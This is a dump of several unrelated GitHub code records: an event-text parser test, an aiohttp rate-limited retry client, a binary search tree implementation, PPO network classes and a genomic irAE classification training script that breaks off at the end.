\"\"\"时间:8月30日20:00\n地址:北京市东城区方家胡同野友趣\n简介:北京周赛\n\"\"\"\n\ndemo = \"\"\"标题:北京周赛 #61\n时间:8月30日 20:00\n地址:北京市东城区方家胡同xx号野友趣\n简介:北京周赛!晚上18:00开门,本周同时有双打,可以来玩。请尽量带setup!\n联系方式:微信xxxxx(加好友)/QQ群xxxx\n活动费用:购买饮料或任意食物\n报名方式:微信群内报名 / https://smash.gg/xxxxxx/register\n直播地址:暂无 / https://live.bilibili.com/xxxxx\n\"\"\"\n\n\ndef parser(text: str) -> OfflineEvent:\n event = OfflineEvent()\n lines = text.splitlines()\n\n title = lines.pop(0)\n if not title.startswith('标题:'):\n raise ValueError('无法识别标题,请确认该行开头是否与示例保持一致')\n event.title = title[3:]\n if not event.title:\n raise ValueError('请填写活动标题!')\n\n start_time = lines.pop(0)\n if not start_time.startswith('时间:'):\n raise ValueError('无法识别时间,请确认该行开头是否与示例保持一致')\n event.start = get_time(start_time[3:])\n if not event.start:\n raise ValueError('无法解析时间,请尝试以下格式:x月x日 xx:xx')\n\n address = lines.pop(0)\n if not address.startswith('地址:'):\n raise ValueError('无法识别地址,请确认该行开头是否与示例保持一致')\n event.address = get_address(address[3:])\n if not event.address:\n raise ValueError('无法解析地址,请尝试以下格式:北京市东城区方家胡同xx号野友趣')\n\n info = lines.pop(0)\n if not info.startswith('简介:'):\n raise ValueError('无法识别简介,请确认该行开头是否与示例保持一致')\n event.info = info[3:]\n\n contact = lines.pop(0)\n if not contact.startswith('联系方式:'):\n raise ValueError('无法识别联系方式,请确认该行开头是否与示例保持一致')\n event.contact = contact[5:]\n\n fee = lines.pop(0)\n if not fee.startswith('活动费用:'):\n raise ValueError('无法识别活动费用,请确认该行开头是否与示例保持一致')\n event.fee = fee\n\n register = lines.pop(0)\n if not register.startswith('报名方式:'):\n raise ValueError('无法识别报名方式,请确认该行开头是否与示例保持一致')\n event.register = register[5:]\n\n live = lines.pop(0)\n if not live.startswith('直播地址:'):\n raise ValueError('无法识别直播地址,请确认该行开头是否与示例保持一致')\n event.live = live[5:]\n\n return event\n\n\nresult = parser(demo)\nprint(result.__dict__)\n","repo_name":"fi6/kaiheila-bot-up","sub_path":"test/event-info.py","file_name":"event-info.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74494522728","text":"import asyncio\n\nfrom aiohttp import (\n ClientConnectionError,\n ClientPayloadError,\n ClientSession,\n TraceConfig,\n)\nfrom aiohttp_retry import ExponentialRetry, RetryClient\n\nfrom .asyncio import RateLimiterMixin\nfrom .logging import get_logger\n\nlogger = get_logger()\n\n\nasync def on_request_end(session, context, params):\n if params.response.ok:\n return\n\n logger.error(\n (\n f\"{params.response.status} {params.response.reason}: \"\n f\"{params.method} {params.response.url}\"\n ),\n )\n\n\nasync def on_request_exception(session, context, params):\n if isinstance(params.exception, asyncio.CancelledError):\n return\n\n logger.error(f\"{params.exception}: {params.method} {params.url}\")\n\n\ntrace_config = TraceConfig()\ntrace_config.on_request_end.append(on_request_end)\ntrace_config.on_request_exception.append(on_request_exception)\n\n\nclass RateLimitRetry(ExponentialRetry):\n def __init__(self, *args, rate_limit_timeout, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.rate_limit_timeout = rate_limit_timeout\n\n def get_timeout(self, attempt, response, *args, **kwargs):\n if response is not None and response.status in {408, 429}:\n self.attempts += 1\n return self.rate_limit_timeout\n\n return super().get_timeout(attempt, response, *args, **kwargs)\n\n\nclass RetryClientSession(RetryClient):\n def __init__(\n self,\n base_url=None,\n *args,\n connection_limit=None,\n raise_for_status=True,\n **kwargs,\n ):\n trace_configs = kwargs.pop(\"trace_configs\", [trace_config])\n\n super().__init__(\n *args,\n **kwargs,\n base_url=base_url,\n raise_for_status=raise_for_status,\n trace_configs=trace_configs,\n )\n\n if connection_limit is not None:\n self._client._connector._limit = connection_limit\n\n\nclass RateLimitedRetryClientSession(RateLimiterMixin, RetryClientSession):\n def __init__(\n self,\n *args,\n attempts=3,\n connection_limit=None,\n rate_limit,\n rate_limit_period=60,\n start_timeout=0.25,\n **kwargs,\n ):\n super().__init__(\n *args,\n **kwargs,\n client_session=ClientSession(*args, **kwargs),\n connection_limit=connection_limit,\n rate_limit=rate_limit,\n rate_limit_period=rate_limit_period,\n retry_options=RateLimitRetry(\n attempts=attempts,\n evaluate_response_callback=self.response_callback,\n exceptions={\n ClientConnectionError,\n ClientPayloadError,\n asyncio.TimeoutError,\n },\n rate_limit_timeout=rate_limit_period,\n start_timeout=start_timeout,\n ),\n )\n\n self._client_request = self._client._request\n self._client._request = self._request\n\n async def _request(self, *args, **kwargs):\n async with self._rate_limiter:\n return await self._client_request(*args, **kwargs)\n\n async def response_callback(self, response):\n return response is not None and response.status not in {408, 429}\n","repo_name":"lubo/useful-scripts","sub_path":"bookmarkmgr/bookmarkmgr/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28212072992","text":"class Binary_Node:\n def __init__(A, x):\n A.item = x\n A.left = None\n A.right = None\n A.parent = None\n # A.subtree_update()\n\n # self 대신에 A로 쓸 수도 있네\n # 여기서는 __iter__를 안쓰네?\n def subtree_iter(A):\n if A.left:\n yield from A.left.subtree_iter()\n yield A\n if A.right:\n yield from A.right.subtree_iter()\n\n def subtree_first(A):\n if A.left:\n return A.left.subtree_first()\n else:\n return A\n\n def subtree_last(A):\n if A.right:\n return A.right.subtree_last()\n else:\n return A.right\n\n # 없는 경우는 None이 반환되는 듯.\n def successor(A):\n if A.right:\n return A.right.subtree_first()\n while A.parent and (A is A.parent.right):\n A = A.parent\n return A.parent\n\n def predecessor(A):\n if A.left:\n return A.left.subtree_last()\n while A.parent and (A is A.parent.left):\n A = A.parent\n return A.parent\n\n def subtree_insert_before(A, B):\n if A.left:\n A = A.left.subtree_last()\n # parent도 관리해줘야함 주의\n A.right, B.parent = B, A\n else:\n A.left, B.parent = B, A\n # A.maintain()\n\n def subtree_insert_after(A, B):\n if A.right:\n A = A.right.subtree_first()\n A.left, B.parent = B, A\n else:\n A.right, B.parent = B, A\n # A.maintain()\n\n def subtree_delete(A):\n if A.left or A.right:\n if A.left:\n B = A.predecessor()\n else:\n B = A.successor()\n A.item, B.item = B.item, A.item\n return B.subtree_delete()\n if A.parent:\n if A.parent.left is A:\n A.parent.left = None\n if A.parent.right is A:\n A.parent.right = None\n # A.parent.maintain()\n return A\n\n\nclass Binary_Tree:\n def __init__(T, Node_Type=Binary_Node):\n T.root = None\n T.size = 0\n T.Node_Type = Node_Type\n\n def __len__(T):\n return T.size\n\n def __iter__(T):\n if T.root:\n for A in T.root.subtree_iter():\n yield A.item\n\n\n# Binary tree로 Set interface를 구현하려면 키 순서가 순회 순서가 되도록 키를 저장한다. 왼쪽 서브트리의 키들이 작고 오른쪽 서브트리의 키들이 큰 특징을 Binary Search Tree Property라 부른다.\n\n\nclass BST_Node(Binary_Node):\n def subtree_find(A, k):\n if k < A.item.key:\n if A.left:\n return A.left.subtree_find(k)\n elif k > A.item.key:\n if A.right:\n return A.right.subtree_find(k)\n else:\n return A\n return None\n\n def subtree_find_next(A, k):\n if A.item.key <= k:\n if A.right:\n return A.right.subtree_find_next(k)\n else:\n return None\n elif A.left:\n B = A.left.subtree_find_next(k)\n if B:\n return B\n return A\n\n def subtree_find_prev(A, k):\n if k <= A.item.key:\n if A.left:\n return A.left.subtree_find_prev(k)\n else:\n return None\n elif A.right:\n B = A.right.subtree_find_prev(k)\n if B:\n return B\n return A\n\n def subtree_insert(A, B):\n if B.item.key < A.item.key:\n if A.left:\n # 이건 여기 클래스에서 정의한거\n A.left.subtree_insert(B)\n else:\n # 이건 아까 정의한거\n A.subtree_insert_before(B)\n elif B.item.key > A.item.key:\n if A.right:\n A.right.subtree_insert(B)\n else:\n A.subtree_insert_after(B)\n else:\n A.item = B.item\n\n\nclass Set_Binary_Tree(Binary_Tree):\n def __init__(self):\n # 오 이렇게 하네?\n super().__init__(BST_Node)\n\n def iter_order(self):\n yield from self\n\n def build(self, X):\n for x in X:\n self.insert(x)\n\n def find_min(self):\n if self.root:\n return self.root.subtree_first().item\n\n def find_max(self):\n if self.root:\n return self.root.subtree_last().item\n\n def find(self, k):\n if self.root:\n node = self.root.subtree_find(k)\n if node:\n return node.item\n\n def find_next(self, k):\n if self.root:\n node = self.root.subtree_find_next(k)\n if node:\n return node.item\n\n def find_prev(self, k):\n if self.root:\n node = self.root.subtree_find_prev(k)\n if node:\n return node.item\n\n def insert(self, x):\n new_node = self.Node_Type(x)\n if self.root:\n self.root.subtree_insert(new_node)\n # 이미 있는 키인 경우\n if new_node.parent is None:\n return False\n else:\n self.root = new_node\n self.size += 1\n return True\n\n def delete(self, k):\n assert self.root\n node = self.root.subtree_find(k)\n assert node\n ext = node.subtree_delete()\n if ext.parent is None:\n self.root = None\n self.size -= 1\n return ext.item\n","repo_name":"Yeolyi/blog_src","sub_path":"cs/6.006/src/lecture6/Binary_Tree.py","file_name":"Binary_Tree.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5686801199","text":"\nfrom collections import namedtuple,deque\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ActorNet(nn.Module):\n\n def __init__(self,state_size,action_size):\n super(ActorNet, self).__init__()\n self.fc1 = nn.Linear(state_size, 256)\n self.fc2 = nn.Linear(256,256)\n self.mu_head = nn.Linear(256, action_size)\n self.sigma_head = nn.Linear(256, action_size)\n self.bn1 = nn.BatchNorm1d(256)\n\n def forward(self, x):\n x = F.relu(self.bn1(self.fc1(x)))\n x = F.relu(self.fc2(x))\n mu = 2.0 * torch.tanh(self.mu_head(x))\n sigma = F.softplus(self.sigma_head(x))\n return (mu, sigma)\n\n\nclass CriticNet(nn.Module):\n\n def __init__(self,state_size):\n super(CriticNet, self).__init__()\n self.fc1 = nn.Linear(state_size, 256)\n self.fc2 = nn.Linear(256,256)\n self.v_head = nn.Linear(256, 1)\n self.bn1 = nn.BatchNorm1d(256)\n\n\n def forward(self, x):\n x = F.relu(self.bn1(self.fc1(x)))\n x = F.relu(self.fc2(x))\n state_value = self.v_head(x)\n return state_value\n\n\nclass Memory():\n def __init__(self):\n self.trajectory=[]\n self.Transition = namedtuple('Transition', ['state', 'action', 'prob', 'reward'])\n\n def add(self,state,action,prob,reward):\n # state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.trajectory.append(self.Transition(state,action,prob,reward))\n\n def clean_buffer(self):\n del self.trajectory[:]\n\n def __len__(self):\n return len(self.trajectory)\n\n","repo_name":"Quantum-Cheese/reinforcement_learning_projects","sub_path":"Unity-projects/Reacher/PPO/PPO_utils.py","file_name":"PPO_utils.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"22509910625","text":"# Both XGB and DNN are performed simultaneously\n# parameters : XGB - param_grid, n_jobs, DNN - max_epochs, lrn_rate , Main - # of iter\n## for the integration of various kinds of features\n# refer to https://tutorials.pytorch.kr/beginner/saving_loading_models.html for model save and load\n# refer to https://quokkas.tistory.com/entry/pytorch%EC%97%90%EC%84%9C-EarlyStop-%EC%9D%B4%EC%9A%A9%ED%95%98%EA%B8%B0 for early-stopping\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch as T\nimport sys\nfrom scipy.stats import randint as sp_randint\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom xgboost import XGBClassifier, XGBRegressor\nfrom xgboost import plot_importance\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, roc_auc_score, auc, f1_score, precision_recall_curve, average_precision_score\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nimport timeit\nfrom pickle import dump\nimport pickle\nimport joblib\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\n################### Functions ######################\n\ndef list2file(lst, fname):\n f = open(fname, \"w\")\n for feat in lst:\n f.write(feat+\"\\n\")\n f.close()\n\ndef scaler(X_train, X_test):\n sc_X = MinMaxScaler(feature_range=(-1, 1))\n array_train = sc_X.fit_transform(X_train)\n array_test = sc_X.transform(X_test)\n X_train_sc = pd.DataFrame(array_train, index=X_train.index, columns=X_train.columns)\n X_test_sc = pd.DataFrame(array_test, index=X_test.index, columns=X_test.columns)\n return X_train_sc, X_test_sc, sc_X\n\ndef scaler_final(X_train):\n sc_X = MinMaxScaler(feature_range=(-1, 1))\n array_train = sc_X.fit_transform(X_train)\n X_train_sc = pd.DataFrame(array_train, index=X_train.index, columns=X_train.columns)\n return X_train_sc, sc_X\n\n### XGB\ndef XGB_main(X, y):\n\txgb = XGBClassifier(objective='binary:logistic', eval_metric='auc', use_label_encoder=False)\n\tclf = RandomizedSearchCV(estimator = xgb, param_distributions = xgb_param_grid, n_iter = 100, cv = stfold, n_jobs = -1)\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### SVM\ndef SVM_main(X, y):\n\tclf = RandomizedSearchCV(estimator = SVC(), param_distributions = svm_param_grid, n_iter = 1, cv = stfold, n_jobs = 10, scoring=\"roc_auc\")\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### RF\ndef RF_main(X, y):\n\tclf = RandomizedSearchCV(estimator = RandomForestClassifier(), param_distributions = rf_param_grid, n_iter = 100, cv = stfold, n_jobs = -1, scoring=\"roc_auc\")\n\tclf.fit(X, y)\n\tcv_results_ = clf.cv_results_\n\tbest_params_ = clf.best_params_\n\tbest_score_ = clf.best_score_\n\tbest_estimator_ = clf.best_estimator_\n\treturn cv_results_, best_params_, best_score_, best_estimator_\n\n### DNN\nclass Net(T.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.hid1 = T.nn.Linear(num_feat, 4) # Initial : 4-(8-8)-1\n self.hid2 = T.nn.Linear(4, 8)\n self.hid3 = T.nn.Linear(8, 8)\n self.oupt = T.nn.Linear(8, 1)\n T.nn.init.xavier_uniform_(self.hid1.weight)\n T.nn.init.zeros_(self.hid1.bias)\n T.nn.init.xavier_uniform_(self.hid2.weight)\n T.nn.init.zeros_(self.hid2.bias)\n T.nn.init.xavier_uniform_(self.hid3.weight)\n T.nn.init.zeros_(self.hid3.bias)\n T.nn.init.xavier_uniform_(self.oupt.weight)\n T.nn.init.zeros_(self.oupt.bias)\n def forward(self, x):\n z = T.tanh(self.hid1(x))\n z = T.tanh(self.hid2(z))\n z = T.tanh(self.hid3(z))\n z = T.sigmoid(self.oupt(z))\n return z\n\nclass Batcher:\n def __init__(self, num_items, batch_size, seed=0):\n self.indices = np.arange(num_items)\n self.num_items = num_items\n self.batch_size = batch_size\n self.rnd = np.random.RandomState(seed)\n self.rnd.shuffle(self.indices)\n self.ptr = 0\n def __iter__(self):\n return self\n def __next__(self):\n if self.ptr + self.batch_size > self.num_items:\n self.rnd.shuffle(self.indices)\n self.ptr = 0\n raise StopIteration # exit calling for-loop\n else:\n result = self.indices[self.ptr:self.ptr+self.batch_size]\n self.ptr += self.batch_size\n return result\n\nclass EarlyStopping:\n def __init__(self, patience=7, verbose=False, delta=0, path='checkpoint.pt'):\n self.patience = patience\n self.verbose = verbose\n self.counter = 0\n self.best_score = None\n self.early_stop = False\n self.val_loss_min = np.Inf\n self.delta = delta\n self.path = path\n def __call__(self, val_loss, model):\n score = -val_loss\n if self.best_score is None:\n self.best_score = score\n self.save_checkpoint(val_loss, model)\n elif score < self.best_score + self.delta:\n self.counter += 1\n print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\n if self.counter >= self.patience:\n self.early_stop = True\n else:\n self.best_score = score\n self.save_checkpoint(val_loss, model)\n self.counter = 0\n def save_checkpoint(self, val_loss, model):\n if self.verbose:\n print(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). Saving model ...')\n T.save(model.state_dict(), self.path)\n self.val_loss_min = val_loss\n\ndef AUC(model, data_x, data_y):\n X = T.Tensor(data_x)\n Y = T.ByteTensor(data_y) # a Tensor of 0s and 1s\n oupt = model(X) # a Tensor of floats\n score = average_precision_score(Y.numpy(), oupt.detach().numpy())\n return score\n\ndef DNN_main(X_train, X_test, y_train, y_test):\n train_losses = []\n valid_losses = []\n avg_train_losses = []\n avg_valid_losses = []\n early_stopping = EarlyStopping(patience = patience, verbose = True)\n # change the data format\n train_x = X_train.to_numpy()\n train_y = y_train.to_numpy().reshape(-1,1)\n test_x = X_test.to_numpy()\n test_y = y_test.to_numpy().reshape(-1,1)\n # building a model\n net = Net()\n net = net.train()\n loss_func = T.nn.BCELoss()\n optimizer = T.optim.Adam(net.parameters(), lr=lrn_rate)\n n_items = len(train_x)\n bat_size = round(n_items/5)\n batcher = Batcher(n_items, bat_size)\n # training\n for epoch in range(1, max_epochs+1):\n print(\"\\nTraining START\")\n for curr_bat in batcher:\n X = T.Tensor(train_x[curr_bat])\n Y = T.Tensor(train_y[curr_bat])\n optimizer.zero_grad()\n oupt = net(X)\n loss_obj = loss_func(oupt, Y)\n loss_obj.backward()\n optimizer.step()\n train_losses.append(loss_obj.item())\n print(\"Training COMPLETE\")\n Auc = AUC(net, train_x, train_y)\n print(\"train ap score = %0.2f%%\" % Auc)\n # evaluation of held-out test set\n net = net.eval()\n X_test = T.Tensor(test_x)\n Y_test = T.Tensor(test_y)\n oupt_test = net(X_test)\n loss_ = loss_func(oupt_test, Y_test)\n valid_losses.append(loss_.item())\n auc = AUC(net, test_x, test_y)\n print(\"test ap score on = %0.2f%%\" % auc)\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n epoch_len = len(str(max_epochs))\n print_msg = (f'[{epoch:>{epoch_len}}/{max_epochs:>{epoch_len}}] ' +\n f'train_loss: {train_loss:.5f} ' +\n f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n early_stopping(valid_loss, net)\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n net.load_state_dict(T.load('checkpoint.pt'))\n return net, avg_train_losses, avg_valid_losses, auc\n\ndef DNN_final_train(X_train, y_train):\n train_losses = []\n avg_train_losses = []\n early_stopping = EarlyStopping(patience = patience, verbose = True)\n # change the data format\n train_x = X_train.to_numpy()\n train_y = y_train.to_numpy().reshape(-1,1)\n # building a model\n net = Net()\n net = net.train()\n loss_func = T.nn.BCELoss()\n optimizer = T.optim.Adam(net.parameters(), lr=lrn_rate)\n n_items = len(train_x)\n bat_size = round(n_items/5)\n batcher = Batcher(n_items, bat_size)\n # training\n for epoch in range(1, max_epochs+1):\n print(\"\\nTraining START\")\n for curr_bat in batcher:\n X = T.Tensor(train_x[curr_bat])\n Y = T.Tensor(train_y[curr_bat])\n optimizer.zero_grad()\n oupt = net(X)\n loss_obj = loss_func(oupt, Y)\n loss_obj.backward()\n optimizer.step()\n train_losses.append(loss_obj.item())\n print(\"Training COMPLETE\")\n Auc = AUC(net, train_x, train_y)\n print(\"train ap score = %0.2f%%\" % Auc)\n train_loss = np.average(train_losses)\n avg_train_losses.append(train_loss)\n epoch_len = len(str(max_epochs))\n print_msg = (f'[{epoch:>{epoch_len}}/{max_epochs:>{epoch_len}}] ' +\n f'train_loss: {train_loss:.5f}')\n print(print_msg)\n # clear lists to track next epoch\n train_losses = []\n return net, avg_train_losses, Auc\n\n###########################################\n#### Training data Processing ####\nstart = timeit.default_timer()\nprint(\"\\n\"*5)\nprint(\"#\"*10+\" PROCESS START \"+\"#\"*10)\n\ntype_ = sys.argv[1] # ANY, SKIN, ENDO etc.\nlabmd = sys.argv[2] # all, within, onlyCtr\ncores = int(sys.argv[3])\nn_iter = int(sys.argv[4])\n\n## Inputs\nf_gt = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/VQSR_nonsyn_608_header.txt\"\nf_cli = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat\"\nf_drug = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat_drug2\" ## Mono\nf_lab = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_lab_final\"\nf_hla = \"/home/changhwan/jh_irAE/01_data/Asan_normal_HLA.txt\"\nf_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/02_Asan_cnv_exon_header2.txt\"\n\n## Dataframes for significant feature indexes\nf_snp_cm = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/06_maf_lr_onlyCtr_%s_filt_res_sorted_rsid_proc_clumped_sorted.bed\"%(type_) # for snpid\n#f_snp_cm = \"/home/omics/DATA1/changhwan/Asan_irAE/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/13.ANY_fdr/06_maf_lr_onlyCtr_ANY_filt_res_sorted_rsid_proc_clumped_sorted.bed\"\nf_res_cli = \"/home/changhwan/amc/08.Analysis/33.final/00.clinical/05.analysis_table1_p001.res\"\nf_res_hla = \"/home/changhwan/amc/08.Analysis/33.final/01.hla/05_re_lr_sort_p001.res\"\n#f_res_cm = \"/home/changhwan/amc/08.Analysis/33.final/02.wes/06.maf_lr_onlyCtr_cm/09.merge_res_lr_ap_final.txt\"\nf_res_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/03_cnv_lr_onlyCtr2/03_%s_p001_gene.tsv\"%(type_)\n#f_res_cnv = \"/home/changhwan/amc/08.Analysis/33.final/11.cnv/03_cnv_lr_onlyCtr2/01_ANY_fdr_filt2.res\"\n\n#### Processing cov df ####\ndf_cli = pd.read_csv(f_cli,sep=\"\\t\",index_col=0)\ndf_drug = pd.read_csv(f_drug, sep=\"\\t\", index_col=0)\ndf_cov = pd.merge(df_cli, df_drug[\"MONO\"], left_index=True, right_index=True)\ndf_cov.Sex = df_cov.Sex - 1\n\ndf_res_cli = pd.read_csv(f_res_cli, sep=\"\\t\")\nlst_cli = df_res_cli.loc[df_res_cli[\"lab\"]==type_,\"feat\"].to_list()\nlst_cli.append(\"Sex\")\nlst_cli.append(\"Age\")\n\ndf_cli_sub = df_cov.loc[df_cov[\"MONO\"]==1,lst_cli]\n\n#### Processing LAB df ####\ndf_lab = pd.read_csv(f_lab, sep=\"\\t\", index_col=0)\ndf_lab_sub = df_lab[type_]\n\n#### Processing HLA dataframe ####\ndf_hla = pd.read_csv(f_hla, sep=\"\\t\", index_col=0, header=None)\nlst_sm = list(df_hla.index)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_hla.index = lst_new\nhla_inc = [1,2,3,4,5,6,7,8,11,12,15,16] # A,B,C,DRB1, DQB1, DPB1\ndf_hla = df_hla.loc[:,hla_inc]\ndf_hla_stacked = df_hla.stack().str.get_dummies().sum(level=0)\n\ndf_res_hla = pd.read_csv(f_res_hla, sep=\"\\t\")\nset_hla = set(df_res_hla.loc[df_res_hla[\"lab\"]==type_,\"hla\"].to_list())\n\ndf_hla_sub = df_hla_stacked[set_hla]\n\n#### Processing CNV dataframe ####\ndf_cnv_tmp = pd.read_csv(f_cnv, sep=\"\\t\",index_col=0)\ndf_cnv = df_cnv_tmp.drop(\"gene\",axis=1)\n## change the format of sample name\nlst_sm = list(df_cnv.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_cnv.columns = lst_new\n\ndf_res_cnv = pd.read_csv(f_res_cnv, sep=\"\\t\")\nset_cnv = set(df_res_cnv[\"cnvID\"].to_list())\ndf_cnv_sub = df_cnv.T[set_cnv]\n\n#### Processing SNP df ####\ndf_gt = pd.read_csv(f_gt, sep=\"\\t\", index_col=0)\ndf_cm = pd.read_csv(f_snp_cm, sep=\"\\t\")\n#df_res_cm = pd.read_csv(f_res_cm, sep=\"\\t\")\n\n## change the format of sample name\nlst_sm = list(df_gt.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf_gt.columns = lst_new\n\n## change index name of df_snp to CHROM_POS_REF_ALT\ndf_cm[['start','end']] = df_cm[['start','end']].astype(str)\ndf_cm.index = df_cm[['chr','start','ref','alt']].agg('_'.join,axis=1) ## agg !!\ndf_cm.index.name = \"CHROM_POS_REF_ALT\"\nlst_cm = list(df_cm.index)\n\n## check the nSNP with highest auc_test score\n#nsnp_cm = int(df_res_cm.loc[df_res_cm[\"label\"]==type_,\"nSNP_inf\"])\n#lst_cm_sub = lst_cm[:nsnp_cm]\n\ndf_cm_sub = df_gt.loc[lst_cm,:].T\n\n\n#### Merge various kinds of feature dataframes\n\n#dfs = [df_cli_sub, df_hla_sub, df_cnv_sub, df_cm_sub, df_lab_sub]\ndfs = [df_cli_sub, df_hla_sub, df_cm_sub, df_lab_sub]\ndf_merge_tmp = pd.concat(dfs, join=\"inner\", axis=1, sort=True)\ndf_merge = df_merge_tmp.loc[:,df_merge_tmp.describe().loc[\"count\",:]>565].dropna() # 3% cut - Protein\n\nif labmd==\"all\":\n\tdf_merge[type_].replace(2,0, inplace=True)\nelif labmd==\"within\":\n\tdf_merge[type_].replace(0, np.nan, inplace=True)\n\tdf_merge[type_].replace(2,0, inplace=True)\nelse: #\"onlyCtr\"\n\tpass\n\ndf_merge_sub = df_merge.loc[df_merge[type_]!=2,:].dropna()\n\n\n################################ Main #########################\n#### Training and cross-validation... optimization process ####\n\ndf_X = df_merge_sub.drop(type_, axis=1)\ndf_y = df_merge_sub[type_]\n\ndf_X_sc, sc_final = scaler_final(df_X)\n\nlst_feat = list(df_X.columns)\nnum_feat = df_X.shape[1]\n\n#### XGBoost ####\nxgb_param_grid = {\n \"min_child_weight\":[0,1,2],\n \"gamma\":[0,1],\n \"n_estimators\" : [int(x) for x in np.linspace(start=200, stop=1000, num=3)],\n \"max_depth\" : [int(x) for x in np.linspace(start=4, stop=10, num=4)],\n \"learning_rate\" :[0.001, 0.01, 0.1],\n \"alpha\": [0,1],\n \"lambda\" : [1,2],\n \"eta\": [0.01, 0.1, 0.2],\n \"subsample\": [0.5, 1.0],\n \"colsample_bytree\": [0.5, 1.0]}\n\nstfold = StratifiedKFold(n_splits=5)\n\ncv_results_xgb, best_params_xgb, best_score_xgb, best_estimator_xgb = XGB_main(df_X, df_y)\n\nsaved_model_xgb = pickle.dumps(best_estimator_xgb)\n#xgb_from_pickle = pickle.loads(saved_model_xgb)\n#xgb_from_pickle.predict(X)\nf_xgb = open(\"results3_xgb.tsv\",\"w\")\nf_xgb.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_xgb, best_params_xgb, best_score_xgb))\nf_xgb.close()\njoblib.dump(best_estimator_xgb, 'best_estimator3_xgb.pkl')\n#xgb_from_joblib = joblib.load('best_estimator_xgb.pkl') \n#xgb_from_joblib.predict(X)\n#average_precision_score(df_y, xgb_from_joblib.predict(df_X))\n\nprint(\"XGB_Training_Done!!\\n\", flush=True)\n\n#### SVM ####\nsvm_param_grid = {\n\t'C': [0.001, 0.01, 0.1, 1, 10, 100], \n\t'gamma': [0.001, 0.01, 0.1, 1, 10, 100],\n\t'kernel': ['rbf', 'poly', 'sigmoid']}\n\ncv_results_svm, best_params_svm, best_score_svm, best_estimator_svm = SVM_main(df_X_sc, df_y)\nf_svm = open(\"results3_svm.tsv\",\"w\")\nf_svm.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_svm, best_params_svm, best_score_svm))\nf_svm.close()\njoblib.dump(best_estimator_svm, 'best_estimator3_svm.pkl')\n\nprint(\"SVM_Training_Done!!\\n\", flush=True)\n\n#### RF ####\nrf_param_grid = {\n\t'bootstrap': [True, False],\n\t'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n\t'max_features': ['auto', 'sqrt'],\n\t'min_samples_leaf': [1, 2, 4],\n\t'min_samples_split': [2, 5, 10],\n\t'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n\ncv_results_rf, best_params_rf, best_score_rf, best_estimator_rf = RF_main(df_X, df_y)\nf_rf = open(\"results3_rf.tsv\",\"w\")\nf_rf.write(\"cv_results:\\n%s\\n\\nbest_params:\\n%s\\n\\nbest_score:\\n%s\"%(cv_results_rf, best_params_rf, best_score_rf))\nf_rf.close()\njoblib.dump(best_estimator_rf, 'best_estimator3_rf.pkl')\n\nprint(\"RF_Training_Done!!\\n\", flush=True)\n\n\n#### DNN ####\nlrn_rate = 0.001\nmax_epochs = 20\npatience = 5\n\nseed = 8\nX_train, X_test, y_train, y_test = train_test_split(df_X, df_y, test_size=0.2,\\\n random_state=seed, stratify=df_y)\nX_train_sc, X_test_sc, sc_X = scaler(X_train, X_test)\n\n# Training final model with whole dataset ####\ndf_X_sc, sc_final = scaler_final(df_X)\nmodel, train_loss_final, auc_final = DNN_final_train(df_X_sc, df_y)\n\n\n#### Predict new test set #### (n=169)\nindir = 